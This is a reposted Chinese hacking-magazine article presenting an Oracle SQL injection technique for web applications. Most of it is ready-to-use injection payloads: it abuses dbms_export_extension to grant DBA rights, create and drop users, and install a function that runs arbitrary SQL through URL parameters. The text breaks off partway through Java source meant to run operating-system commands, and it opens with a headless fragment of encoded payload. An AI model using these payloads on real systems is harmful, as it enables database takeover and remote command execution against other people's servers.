犀利的 oracle 注入技术犀利的 oracle 注入技术
原文发表在黑客手册
linx 2008.1.12
介绍一个在web上通过oracle注入直接取得主机cmdshell的方法。
以下的演示都是在web上的sql plus执行... 09-06-09
||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
确定漏洞存在:
1<>(
select user_id from all_users where username='linxsql'
)
给linxsql连接权限:
select sys.dbms_export_extension.get_domain_index_tables('foo','bar','dbms_output".put(:p1);execute immediate ''declare pragma autonomous_transaction;begin execute immediate ''''
grant connect to linxsql'''';end;'';end;–','sys',0,'1',0) from dual
删除帐号:
select sys.dbms_export_extension.get_domain_index_tables('foo','bar','dbms_output".put(:p1);execute immediate ''declare pragma autonomous_transaction;begin execute immediate ''''
drop user linxsql'''';end;'';end;–','sys',0,'1',0) from dual
======================
以下方法创建一个可以执行多语句的函数linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的user:
1.jsp?id=1 and '1'<>(
select sys.dbms_export_extension.get_domain_index_tables('foo','bar','dbms_output".put(:p1);execute immediate ''declare pragma autonomous_transaction;begin execute immediate ''''
create or replace function linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';end;'';end;–','sys',0,'1',0) from dual
) and …
1.jsp?id=1 and '1'<>(
select sys.dbms_export_extension.get_domain_index_tables('foo','bar','dbms_output".put(:p1);execute immediate ''declare pragma autonomous_transaction;begin execute immediate ''''grant all on linx_query to public'''';end;'';end;–','sys',0,'1',0) from dual
) and …
1.jsp?id=1 and '1'<>(
select sys.linx_query('select 14554 from dual') from dual
) and …
1.jsp?id=1 and '1'<>(
select sys.linx_query('declare pragma
autonomous_transaction; begin execute immediate ''
select 1 from dual
''; commit; end;') from dual
) and …
多语句:
select sys.linx_query('declare temp varchar2(200); begin select 1 into temp from dual; select 2 into temp from dual; end;') from dual
创建用户(除非当前用户有system权限,否则无法成功):
select sys.linx_query('declare pragma
autonomous_transaction; begin execute immediate ''
create user linx_query_user identified by linx_query_user
''; commit; end;') from dual
================
以下的方法是先建立函数linx_query(),再建立 runcmd2()
1.创建函数
select sys.dbms_export_extension.get_domain_index_tables('foo','bar','dbms_output".put(:p1);execute immediate ''declare pragma autonomous_transaction;begin execute immediate ''''
create or replace function linx_query (p
varchar2) return number authid current_user is begin execute immediate
p; return 1; end; '''';end;'';end;–','sys',0,'1',0) from dual;
如果有权限,以下语句应该允许正常
select sys.linx_query('select 1 from dual') from dual;
不然的话运行:
select sys.dbms_export_extension.get_domain_index_tables('foo','bar','dbms_output".put(:p1);execute immediate ''declare pragma autonomous_transaction;begin execute immediate ''''
grant dba to 当前的user'''';end;'';end;–','sys',0,'1',0) from dual
2.创建包
select sys.linx_query('declare pragma
autonomous_transaction; begin execute immediate ''
create or replace and compile java source named "linxutil2" as import java.io.*;public class linxutil2 extends object {public static string runcmd(string args) throws ioexception{bufferedreader myreader= new bufferedre
版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。
如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。
我要评论
发表评论